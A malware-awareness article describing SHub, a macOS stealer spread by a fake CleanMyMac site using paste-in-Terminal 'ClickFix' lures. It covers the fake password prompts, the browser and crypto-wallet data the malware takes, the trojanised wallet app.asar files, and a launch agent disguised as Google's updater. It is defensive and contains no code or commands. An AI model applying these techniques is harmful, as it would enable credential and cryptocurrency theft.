SHub Stealer

SHub is a sophisticated information-stealing malware designed specifically to compromise macOS systems. Its primary objective is to extract sensitive information from browsers, cryptocurrency wallets, and various system components. The threat is particularly dangerous because it combines credential theft, cryptocurrency targeting, and persistent access mechanisms within a single campaign.

The malware is commonly distributed through deceptive methods that trick users into executing malicious commands themselves. Once active, SHub silently gathers valuable data and can maintain long-term access to the infected device. Due to the extent of the information it can collect, this threat poses serious risks, including financial losses, identity theft, and account compromise. Immediate removal is essential if SHub is discovered on a system.

Initial Infection and System Verification

The infection process begins with a loader that executes on the victim's Mac. Before deploying the full malware payload, this loader performs several checks on the system. One of the most notable checks involves examining the system for the presence of a Russian keyboard layout. If such a keyboard is detected, the malware terminates its execution and reports this information back to the attackers.

If the verification stage is successful, the loader collects and transmits basic system details to the attackers' infrastructure. These details include the device's IP address, hostname, macOS version, and keyboard language settings. This information helps the attackers profile the infected machine before proceeding with further actions.

Afterward, the malware downloads a script disguised as a legitimate macOS password prompt. This fake prompt appears to request the user's system password in a routine manner. If the victim enters the password, the attackers gain the ability to unlock the macOS Keychain, which stores highly sensitive information such as saved passwords, Wi-Fi credentials, and private encryption keys.

Extensive Data Collection from Browsers and Wallets

Once access to the system is secured, SHub begins scanning the device for valuable data stored in web browsers and cryptocurrency applications. The malware targets a wide range of Chromium-based browsers, including Arc, Brave, Chrome, Chrome Beta, Chrome Canary, Chrome DevTools, Chromium, Edge, Opera, Opera GX, Orion, Sidekick, Vivaldi, and Coccoc. It also targets Firefox.

From these browsers, the malware extracts stored credentials, cookies, autofill information, and other profile data across all user profiles. The malware also inspects installed browser extensions in search of cryptocurrency wallet extensions.

SHub is capable of stealing information from more than one hundred known cryptocurrency wallets. Examples include Coinbase Wallet, Exodus Web3, Keplr, MetaMask, Phantom, and Trust Wallet. By accessing these extensions, attackers can obtain authentication tokens, wallet access data, and other sensitive details tied to cryptocurrency accounts.

Targeting Desktop Cryptocurrency Applications

In addition to browser-based wallets, SHub focuses heavily on desktop cryptocurrency wallet applications installed on the system. The malware collects data from a large number of wallets, including Atomic Wallet, Binance, Bitcoin Core, BlueWallet, Coinomi, Dogecoin Core, Electrum, Exodus, Guarda, Ledger Live, Ledger Wallet, Litecoin Core, Monero, Sparrow, TON Keeper, Trezor Suite, and Wasabi.

Sensitive data extracted from these applications may include wallet credentials, private keys, and other authentication information. This data can enable attackers to gain direct control over cryptocurrency holdings.

Beyond wallet software, SHub also harvests other forms of sensitive information from the macOS environment. It retrieves data from the macOS Keychain, iCloud account information, Safari cookies and browsing history, Apple Notes databases, and Telegram session files. The malware additionally copies the files .zsh_history, .bash_history, and .gitconfig. These files are particularly valuable because they may contain API keys, authentication tokens, or other developer credentials stored in command histories or configuration settings.

Wallet Manipulation for Ongoing Data Theft

SHub does more than simply collect stored information. It can also modify certain cryptocurrency wallet applications in order to maintain continuous data theft even after the initial compromise.

If the malware detects wallets such as Atomic Wallet, Exodus, Ledger Live, Ledger Wallet, or Trezor Suite, it replaces a key application component known as 'app.asar' with a malicious version. This modified file operates silently in the background while allowing the wallet application to continue functioning normally from the user's perspective.

Through this modification, the compromised wallet applications continue transmitting sensitive information to the attackers. The stolen data may include wallet passwords, seed phrases, and recovery phrases. Some variants of the malware are capable of displaying fake recovery prompts or security update messages to trick users into entering their seed phrases directly.

Persistence and Remote Control Capabilities

To maintain long-term access to the compromised system, SHub installs a backdoor mechanism that enables attackers to communicate with the infected device. The malware creates a background task named 'com.google.keystone.agent.plist.' This name is intentionally chosen to resemble Google's legitimate update service, reducing the likelihood of detection.

Whenever this background task runs, it launches a hidden script that sends the Mac's unique hardware identifier to a remote server and checks for instructions from the attackers. This capability allows the threat actors to remotely control the device and execute additional commands whenever needed.

To avoid alerting the victim during installation, the malware displays a deceptive error message stating that the application is not supported. This message leads users to believe the installation process failed, even though the malware has already been deployed successfully.

Distribution Through the ClickFix Technique

The primary distribution method for SHub relies on social engineering and a technique known as ClickFix. In this campaign, attackers create a fraudulent website that imitates the legitimate CleanMyMac software site. Visitors who believe they are downloading the authentic application are instead presented with unusual installation instructions.

Rather than receiving a normal installer file, users are instructed to open the macOS Terminal and paste a command to complete the installation process. When this command is executed, it downloads and runs a concealed script that installs the SHub malware.

The attack sequence typically unfolds in the following way:

• The victim visits a fake website impersonating the CleanMyMac download page.
• The site instructs the user to open Terminal and paste a provided command as part of the installation.
• Executing the command downloads and runs a hidden script that installs SHub on the system.

Because the victim performs these steps manually, the attack can bypass some traditional security warnings.

Security Risks and Potential Consequences

SHub represents a serious threat to macOS users because of its extensive data collection capabilities and long-term persistence features. Once installed, it can quietly harvest sensitive information and provide attackers with continuous remote access to the compromised device.

Victims of this malware may face a variety of consequences, including:

• Cryptocurrency theft from compromised wallet applications
• Identity theft resulting from stolen personal data and credentials
• Unauthorized access to online accounts and services
• Exposure of developer secrets such as API keys or authentication tokens

Given the scale of information that SHub can collect, preventing infection is critical. Users should remain cautious when downloading software, avoid executing commands from untrusted sources, and verify that websites offering downloads are legitimate. Early detection and immediate removal of the malware are essential to prevent further data compromise.